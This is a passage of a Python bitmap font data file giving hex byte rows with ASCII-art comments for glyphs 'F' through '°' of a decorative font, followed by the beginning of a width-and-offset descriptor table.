0x00, 0x00, #
0x00, 0x00, #
0xFC, 0x00, # OOOOOO
0x44, 0x00, # O O
0x40, 0x00, # O
0x40, 0x00, # O
0x40, 0x00, # O
0x40, 0x00, # O
0x40, 0x00, # O
0x7C, 0x00, # OOOOO
0x40, 0x00, # O
0x43, 0x80, # O OOO
0x42, 0x80, # O O O
0x40, 0x80, # O O
0xFF, 0x00, # OOOOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1210 'F' (7 pixels wide)
0x00, #
0x00, #
0x00, #
0xFE, # OOOOOOO
0x42, # O O
0x5A, # O OO O
0x5C, # O OOO
0x40, # O
0x40, # O
0x40, # O
0x7C, # OOOOO
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0xF8, # OOOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @1232 'G' (13 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x0F, 0x00, # OOOO
0x10, 0xC0, # O OO
0x23, 0x40, # O OO O
0x42, 0x40, # O O O
0x43, 0x80, # O OOO
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x81, 0xF8, # O OOOOOO
0x40, 0x20, # O O
0x60, 0x20, # OO O
0x30, 0x60, # OO OO
0x0F, 0xA0, # OOOOO O
0x00, 0x20, # O
0x01, 0xA0, # OO O
0x01, 0x20, # O O
0x00, 0xC0, # OO
0x00, 0x00, #
0x00, 0x00, #
# @1276 'H' (14 pixels wide)
0x00, 0x38, # OOO
0x00, 0x74, # OOO O
0x3C, 0x5C, # OOOO O OOO
0x10, 0x40, # O O
0x10, 0x40, # O O
0x10, 0x40, # O O
0x10, 0x40, # O O
0x10, 0x40, # O O
0x10, 0xE0, # O OOO
0x1F, 0x20, # OOOOO O
0x10, 0x20, # O O
0x10, 0x20, # O O
0x10, 0x20, # O O
0x10, 0x14, # O O O
0x10, 0x38, # O OOO
0x10, 0x40, # O O
0x10, 0x00, # O
0x70, 0x00, # OOO
0xE0, 0x00, # OOO
0x60, 0x00, # OO
0x00, 0x00, #
0x00, 0x00, #
# @1320 'I' (5 pixels wide)
0x00, #
0x00, #
0xF0, # OOOO
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0xF8, # OOOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @1342 'J' (8 pixels wide)
0x00, #
0x00, #
0x0F, # OOOO
0x02, # O
0x02, # O
0x02, # O
0x02, # O
0x02, # O
0x02, # O
0x02, # O
0x72, # OOO O
0xCA, # OO O O
0xBA, # O OOO O
0xB4, # O OO O
0xC4, # OO O
0x78, # OOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @1364 'K' (12 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x01, 0x00, # O
0xF0, 0xC0, # OOOO OO
0x21, 0x00, # O O
0x21, 0x00, # O O
0x22, 0x00, # O O
0x24, 0x00, # O O
0x28, 0x00, # O O
0x38, 0x00, # OOO
0x28, 0x00, # O O
0x2C, 0x00, # O OO
0x26, 0x70, # O OO OOO
0x23, 0x70, # O OO OOO
0x20, 0xE0, # O OOO
0xF8, 0x00, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1408 'L' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0xF8, 0x00, # OOOOO
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x21, 0x80, # O OO
0x21, 0xC0, # O OOO
0x21, 0xC0, # O OOO
0xF8, 0x40, # OOOOO O
0x07, 0x80, # OOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1452 'M' (16 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x7C, 0x18, # OOOOO OO
0x88, 0x0E, # O O OOO
0xEC, 0x08, # OOO OO O
0x6C, 0x18, # OO OO OO
0x0A, 0x18, # O O OO
0x0A, 0x28, # O O O O
0x09, 0x28, # O O O O
0x09, 0x28, # O O O O
0x08, 0xC8, # O OO O
0x08, 0xC8, # O OO O
0x08, 0x4A, # O O O O
0x08, 0x0D, # O OO O
0x08, 0x0F, # O OOOO
0x3E, 0x09, # OOOOO O O
0x00, 0x06, # OO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1496 'N' (16 pixels wide)
0x00, 0x00, #
0x00, 0x0F, # OOOO
0x38, 0x0F, # OOO OOOO
0x0C, 0x10, # OO O
0x0C, 0x10, # OO O
0x06, 0x10, # OO O
0x06, 0x10, # OO O
0x05, 0x10, # O O O
0x05, 0x10, # O O O
0x04, 0x90, # O O O
0x04, 0xD0, # O OO O
0x04, 0x50, # O O O
0x64, 0x70, # OO O OOO
0xEC, 0x30, # OOO OO OO
0x88, 0x30, # O O OO
0x78, 0x10, # OOOO O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1540 'O' (13 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x08, 0x00, # O
0x33, 0xC0, # OO OOOO
0x24, 0x20, # O O O
0x4E, 0x10, # O OOO O
0x8E, 0x10, # O OOO O
0x84, 0x08, # O O O
0x80, 0x08, # O O
0x80, 0x08, # O O
0x80, 0x08, # O O
0x80, 0x08, # O O
0x40, 0x10, # O O
0x60, 0x20, # OO O
0x30, 0x40, # OO O
0x0F, 0x80, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1584 'P' (12 pixels wide)
0x08, 0x00, # O
0x08, 0x00, # O
0x3F, 0x00, # OOOOOO
0xC8, 0xC0, # OO O OO
0xA8, 0x20, # O O O O
0xE8, 0x10, # OOO O O
0x08, 0x10, # O O
0x08, 0x10, # O O
0x08, 0x20, # O O
0x0E, 0x40, # OOO O
0x0F, 0x80, # OOOOO
0x08, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x3F, 0x80, # OOOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1628 'Q' (15 pixels wide)
0x00, 0x00, #
0x04, 0x00, # O
0x18, 0x00, # OO
0x27, 0xC0, # O OOOOO
0x48, 0x30, # O O OO
0x4B, 0x18, # O O OO OO
0x87, 0x08, # O OOO O
0x80, 0x04, # O O
0x80, 0x04, # O O
0x80, 0x04, # O O
0x80, 0x04, # O O
0xC0, 0x08, # OO O
0x47, 0x88, # O OOOO O
0x28, 0x50, # O O O O
0x10, 0x60, # O OO
0x0F, 0xEE, # OOOOOOO OOO
0x00, 0x3A, # OOO O
0x00, 0x22, # O O
0x00, 0x1C, # OOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1672 'R' (13 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x3F, 0x00, # OOOOOO
0xE1, 0x80, # OOO OO
0x20, 0x40, # O O
0x20, 0x40, # O O
0x20, 0x40, # O O
0x21, 0x80, # O OO
0x22, 0x00, # O O
0x2F, 0x00, # O OOOO
0x21, 0xC0, # O OOO
0x20, 0x40, # O O
0x20, 0x40, # O O
0x20, 0x40, # O O
0xF8, 0x40, # OOOOO O
0x00, 0x58, # O OO
0x00, 0x58, # O OO
0x00, 0x30, # OO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1716 'S' (8 pixels wide)
0x00, #
0x00, #
0x38, # OOO
0xC4, # OO O
0x94, # O O O
0x98, # O OO
0x40, # O
0x20, # O
0x1C, # OOO
0x02, # O
0x79, # OOOO O
0x89, # O O O
0xB1, # O OO O
0x82, # O O
0x46, # O OO
0x38, # OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @1738 'T' (11 pixels wide)
0x00, 0xC0, # OO
0x01, 0xA0, # OO O
0x01, 0xA0, # OO O
0x00, 0x60, # OO
0x07, 0x80, # OOOO
0xFC, 0x00, # OOOOOO
0x84, 0x00, # O O
0x84, 0x00, # O O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x0F, 0x80, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1782 'U' (11 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x71, 0x80, # OOO OO
0x22, 0x40, # O O O
0x43, 0xC0, # O OOOO
0x41, 0xA0, # O OO O
0x40, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x20, # O O
0x80, 0x40, # O O
0x40, 0xC0, # O OO
0x21, 0x80, # O OO
0x1F, 0x00, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1826 'V' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x0C, 0x1C, # OO OOO
0xF0, 0x22, # OOOO O O
0x10, 0x4C, # O O OO
0x18, 0x40, # OO O
0x08, 0x40, # O O
0x08, 0x40, # O O
0x04, 0x40, # O O
0x04, 0x40, # O O
0x04, 0x40, # O O
0x02, 0x40, # O O
0x02, 0x80, # O O
0x02, 0x80, # O O
0x03, 0x00, # OO
0x01, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1870 'W' (19 pixels wide)
0x00, 0x00, 0x00, #
0x00, 0x00, 0x00, #
0x3C, 0x00, 0xE0, # OOOO OOO
0xF0, 0x01, 0x60, # OOOO O OO
0x30, 0x01, 0xE0, # OO OOOO
0x18, 0x30, 0x20, # OO OO O
0x08, 0x30, 0x20, # O OO O
0x08, 0x50, 0x40, # O O O O
0x04, 0x50, 0x40, # O O O O
0x04, 0x58, 0x80, # O O OO O
0x04, 0x88, 0x80, # O O O O
0x02, 0x89, 0x00, # O O O O
0x02, 0x85, 0x00, # O O O O
0x02, 0x85, 0x00, # O O O O
0x01, 0x06, 0x00, # O OO
0x01, 0x02, 0x00, # O O
0x00, 0x00, 0x00, #
0x00, 0x00, 0x00, #
0x00, 0x00, 0x00, #
0x00, 0x00, 0x00, #
0x00, 0x00, 0x00, #
0x00, 0x00, 0x00, #
# @1936 'X' (13 pixels wide)
0x00, 0xC0, # OO
0x7C, 0x30, # OOOOO OO
0x10, 0x40, # O O
0x18, 0x40, # OO O
0x08, 0x80, # O O
0x0C, 0x80, # OO O
0x05, 0x00, # O O
0x07, 0x00, # OOO
0x02, 0x00, # O
0x03, 0x00, # OO
0x03, 0x00, # OO
0x04, 0x80, # O O
0xC4, 0x40, # OO O O
0xC8, 0x40, # OO O O
0x88, 0x38, # O O OOO
0x70, 0xC0, # OOO OO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1980 'Y' (15 pixels wide)
0x00, 0x00, #
0x70, 0x00, # OOO
0x88, 0x18, # O O OO
0xB4, 0x0E, # O OO O OOO
0xB4, 0x08, # O OO O O
0x62, 0x10, # OO O O
0x02, 0x20, # O O
0x02, 0x20, # O O
0x01, 0x20, # O O
0x01, 0x40, # O O
0x00, 0xC0, # OO
0x00, 0x80, # O
0x00, 0x80, # O
0x1D, 0x00, # OOO O
0x2D, 0x00, # O OO O
0x22, 0x00, # O O
0x1C, 0x00, # OOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2024 'Z' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x21, 0x00, # O O
0x3E, 0x80, # OOOOO O
0x20, 0x80, # O O
0x41, 0x00, # O O
0x01, 0x00, # O
0x02, 0x00, # O
0x02, 0x00, # O
0x04, 0x00, # O
0x08, 0x00, # O
0x10, 0xC0, # O OO
0x21, 0x40, # O O O
0x41, 0xC0, # O OOO
0x80, 0x80, # O O
0xFF, 0x00, # OOOOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2068 '[' (3 pixels wide)
0x00, #
0xE0, # OOO
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0xE0, # OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2090 '\' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x80, 0x00, # O
0x40, 0x00, # O
0x40, 0x00, # O
0x20, 0x00, # O
0x10, 0x00, # O
0x10, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x02, 0x00, # O
0x02, 0x00, # O
0x01, 0x00, # O
0x00, 0x80, # O
0x00, 0x80, # O
0x00, 0x40, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2134 ']' (3 pixels wide)
0x00, #
0xE0, # OOO
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0xE0, # OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2156 '^' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x04, 0x00, # O
0x0C, 0x00, # OO
0x0A, 0x00, # O O
0x12, 0x00, # O O
0x11, 0x00, # O O
0x21, 0x00, # O O
0x21, 0x00, # O O
0x40, 0x80, # O O
0x40, 0x80, # O O
0x80, 0x40, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2200 '_' (11 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0xFF, 0xE0, # OOOOOOOOOOO
# @2244 '`' (4 pixels wide)
0x00, #
0x00, #
0x80, # O
0x60, # OO
0x10, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2266 'a' (6 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x38, # OOO
0x4C, # O OO
0xB4, # O OO O
0xB4, # O OO O
0xE4, # OOO O
0x04, # O
0x08, # O
0x78, # OOOO
0x90, # O O
0xF0, # OOOO
0x10, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2288 'b' (9 pixels wide)
0x10, 0x00, # O
0x60, 0x00, # OO
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x4E, 0x00, # O OOO
0x51, 0x00, # O O O
0x58, 0x80, # O OO O
0x58, 0x80, # O OO O
0x40, 0x80, # O O
0x41, 0x00, # O O
0xE3, 0x00, # OOO OO
0x3C, 0x00, # OOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2332 'c' (7 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x1C, # OOO
0x62, # OO O
0x4E, # O OOO
0x8C, # O OO
0x80, # O
0x80, # O
0x80, # O
0x40, # O
0x40, # O
0x3C, # OOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2354 'd' (7 pixels wide)
0x00, #
0x0E, # OOO
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x3C, # OOOO
0x4C, # O OO
0x84, # O O
0x84, # O O
0x9C, # O OOO
0x9C, # O OOO
0x4C, # O OO
0x34, # OO O
0x02, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2376 'e' (7 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x3C, # OOOO
0x42, # O O
0x62, # OO O
0xFC, # OOOOOO
0x80, # O
0x9C, # O OOO
0x9C, # O OOO
0x44, # O O
0x38, # OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2398 'f' (6 pixels wide)
0x00, #
0x38, # OOO
0x44, # O O
0x9C, # O OOO
0x98, # O OO
0x80, # O
0x80, # O
0x40, # O
0x40, # O
0x58, # O OO
0xE0, # OOO
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x78, # OOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2420 'g' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x0E, # OOO
0x08, # O
0x38, # OOO
0x78, # OOOO
0xB4, # O OO O
0x84, # O O
0x84, # O O
0xC8, # OO O
0x70, # OOO
0x20, # O
0x27, # O OOO
0x79, # OOOO O
0xA1, # O O O
0x83, # O OO
0xC6, # OO OO
0x7C, # OOOOO
0x00, #
0x00, #
# @2442 'h' (9 pixels wide)
0x20, 0x00, # O
0xC0, 0x00, # OO
0x40, 0x00, # O
0x40, 0x00, # O
0x40, 0x00, # O
0x40, 0x00, # O
0x6E, 0x00, # OO OOO
0x33, 0x00, # OO OO
0x21, 0x00, # O O
0x21, 0x00, # O O
0x21, 0x00, # O O
0x21, 0x00, # O O
0x21, 0x00, # O O
0x22, 0x00, # O O
0x23, 0x80, # O OOO
0x22, 0x80, # O O O
0xF3, 0x00, # OOOO OO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2486 'i' (4 pixels wide)
0x00, #
0x00, #
0xE0, # OOO
0xE0, # OOO
0xE0, # OOO
0x00, #
0xE0, # OOO
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0xF0, # OOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2508 'j' (6 pixels wide)
0x00, #
0x0C, # OO
0x1C, # OOO
0x1C, # OOO
0x00, #
0x00, #
0x38, # OOO
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x08, # O
0x08, # O
0x78, # OOOO
0xB8, # O OOO
0x98, # O OO
0x70, # OOO
0x00, #
0x00, #
# @2530 'k' (10 pixels wide)
0x70, 0x00, # OOO
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x21, 0x00, # O O
0x21, 0xC0, # O OOO
0x22, 0x00, # O O
0x24, 0x00, # O O
0x38, 0x00, # OOO
0x30, 0x00, # OO
0x2C, 0x00, # O OO
0x25, 0xC0, # O O OOO
0x24, 0x40, # O O O
0xF7, 0x80, # OOOO OOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2574 'l' (4 pixels wide)
0x00, #
0xE0, # OOO
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x80, # O
0x80, # O
0xB0, # O OO
0xB0, # O OO
0x90, # O O
0xE0, # OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2596 'm' (13 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0xC0, 0xE0, # OO OOO
0x5D, 0x10, # O OOO O O
0x66, 0x08, # OO OO O
0x42, 0x08, # O O O
0x42, 0x08, # O O O
0x42, 0x08, # O O O
0x42, 0x08, # O O O
0x4C, 0x68, # O OO OO O
0x4C, 0x70, # O OO OOO
0xE0, 0x60, # OOO OO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2640 'n' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x40, 0x00, # O
0xCE, 0x00, # OO OOO
0x51, 0x00, # O O O
0x60, 0x80, # OO O
0x40, 0x80, # O O
0x40, 0x80, # O O
0x40, 0x80, # O O
0x40, 0x80, # O O
0x4D, 0x00, # O OO O
0x49, 0x00, # O O O
0xE6, 0x00, # OOO OO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2684 'o' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x1C, # OOO
0x7A, # OOOO O
0x59, # O OO O
0x81, # O O
0x81, # O O
0x81, # O O
0x81, # O O
0x42, # O O
0x66, # OO OO
0x3C, # OOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2706 'p' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x30, 0x00, # OO
0x56, 0x00, # O O OO
0x3D, 0x00, # OOOO O
0x2C, 0x80, # O OO O
0x20, 0x80, # O O
0x20, 0x80, # O O
0x20, 0x80, # O O
0x31, 0x00, # OO O
0x2E, 0x00, # O OOO
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0xF0, 0x00, # OOOO
0x00, 0x00, #
0x00, 0x00, #
# @2750 'q' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x40, # O
0x00, 0xC0, # OO
0x1E, 0x80, # OOOO O
0x22, 0x80, # O O O
0x41, 0x80, # O OO
0x81, 0x80, # O OO
0x99, 0x80, # O OO OO
0x9D, 0x00, # O OOO O
0x85, 0x00, # O O O
0x4D, 0x00, # O OO O
0x39, 0x00, # OOO O
0x01, 0x00, # O
0x01, 0x00, # O
0x01, 0x00, # O
0x01, 0x00, # O
0x07, 0xC0, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
# @2794 'r' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x27, 0x00, # O OOO
0x28, 0x80, # O O O
0x7E, 0x80, # OOOOOO O
0x2F, 0x00, # O OOOO
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x28, 0x00, # O O
0xF0, 0x00, # OOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2838 's' (5 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x70, # OOO
0xA8, # O O O
0xB8, # O OOO
0x80, # O
0x40, # O
0x20, # O
0x10, # O
0x08, # O
0x68, # OO O
0x48, # O O
0x70, # OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2860 't' (6 pixels wide)
0x00, #
0x00, #
0x00, #
0x20, # O
0x20, # O
0x3C, # OOOO
0xE0, # OOO
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x20, # O
0x3C, # OOOO
0x3C, # OOOO
0x24, # O O
0x18, # OO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2882 'u' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x67, # OO OOO
0xE2, # OOO O
0xE2, # OOO O
0x42, # O O
0x42, # O O
0x82, # O O
0x82, # O O
0x82, # O O
0x46, # O OO
0x3A, # OOO O
0x03, # OO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @2904 'v' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x03, 0x00, # OO
0x27, 0x80, # O OOOO
0xC5, 0x80, # OO O OO
0x26, 0x80, # O OO O
0x20, 0x80, # O O
0x10, 0x80, # O O
0x11, 0x00, # O O
0x09, 0x00, # O O
0x0A, 0x00, # O O
0x0A, 0x00, # O O
0x04, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2948 'w' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x04, # O
0x21, 0xCA, # O OOO O O
0x70, 0x8E, # OOO O OOO
0xB0, 0x82, # O OO O O
0x11, 0x42, # O O O O
0x11, 0x44, # O O O O
0x09, 0x44, # O O O O
0x0A, 0x28, # O O O O
0x0A, 0x28, # O O O O
0x0C, 0x10, # OO O
0x04, 0x10, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @2992 'x' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x27, 0x00, # O OOO
0x62, 0x00, # OO O
0x32, 0x00, # OO O
0x14, 0x00, # O O
0x18, 0x00, # OO
0x18, 0x00, # OO
0x28, 0x00, # O O
0x4B, 0x80, # O O OOO
0xC7, 0x80, # OO OOOO
0x63, 0x00, # OO OO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @3036 'y' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x07, # OOO
0x45, # O O O
0xE1, # OOO O
0x21, # O O
0x32, # OO O
0x12, # O O
0x14, # O O
0x14, # O O
0x08, # O
0x08, # O
0x10, # O
0x70, # OOO
0xA0, # O O
0xE0, # OOO
0x00, #
0x00, #
0x00, #
# @3058 'z' (8 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x70, # OOO
0x71, # OOO O
0x3F, # OOOOOO
0x02, # O
0x02, # O
0x04, # O
0x08, # O
0x10, # O
0x20, # O
0x41, # O O
0xFE, # OOOOOOO
0x86, # O OO
0x02, # O
0x00, #
0x00, #
0x00, #
0x00, #
# @3080 '{' (6 pixels wide)
0x00, #
0x00, #
0x38, # OOO
0x44, # O O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0xC0, # OO
0x20, # O
0x20, # O
0x60, # OO
0x40, # O
0x40, # O
0x38, # OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @3102 '|' (1 pixels wide)
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @3124 '}' (5 pixels wide)
0x00, #
0x00, #
0x60, # OO
0x90, # O O
0x10, # O
0x10, # O
0x20, # O
0x20, # O
0x20, # O
0x18, # OO
0x20, # O
0x20, # O
0x20, # O
0x10, # O
0x10, # O
0xE0, # OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @3146 '~' (11 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x38, 0x20, # OOO O
0x4C, 0x20, # O OO O
0x86, 0x40, # O OO O
0x83, 0x80, # O OOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @3190 '°' (4 pixels wide)
0x00, #
0x00, #
0x60, # OO
0x90, # O O
0x90, # O O
0x60, # OO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
)
descriptors = (
(3,0),# !
(3,22),# "
(9,44),# #
(6,88),# $
(10,110),# %
(13,154),# &
(1,198),# '
(4,220),# (
(4,242),# )
(7,264),# *
(11,286),# +
(2,330),# ,
(5,352),# -
(1,374),# .
(9,396),# /
(9,440),# 0
(8,484),# 1
(8,506),# 2
